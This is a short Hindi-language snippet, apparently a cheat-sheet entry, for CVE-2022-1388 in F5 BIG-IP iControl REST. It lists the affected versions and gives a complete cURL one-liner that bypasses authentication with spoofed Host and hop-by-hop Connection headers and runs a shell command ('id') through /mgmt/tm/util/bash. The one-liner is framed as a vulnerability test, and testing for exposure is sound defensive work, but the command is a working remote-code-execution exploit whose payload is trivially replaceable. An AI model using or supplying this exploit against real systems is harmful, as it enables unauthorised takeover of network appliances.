
CVE-2022-1388 BIG-IP iControl REST RCE का परीक्षण करने के लिए cURL वन-लाइनर
F5 BIG-IP के 16.1.x संस्करण, 16.1.2.2 से पहले, 15.1.x संस्करण 15.1.5.1 से पहले, 14.1.x संस्करण 14.1.4.6 से पहले, 13.1.x संस्करण 13.1.5 से पहले, और सभी 12.1.x और 11.6.x संस्करणों में, अवर्गीकृत अनुरोध iControl REST प्रमाणीकरण को बायपास कर सकते हैं।
इस भेद्यता का परीक्षण करने के लिए निम्नलिखित cURL वन-लाइनर का उपयोग करें।
curl -k --header "Host: 127.0.0.1" --header "Authorization: Basic YWRtaW46YWRtaW4=" --header "X-F5-Auth-Token: asdf" --header "Connection: X-F5-Auth-Token" --header "Content-Type: application/json" https://$IPADDRESS /mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'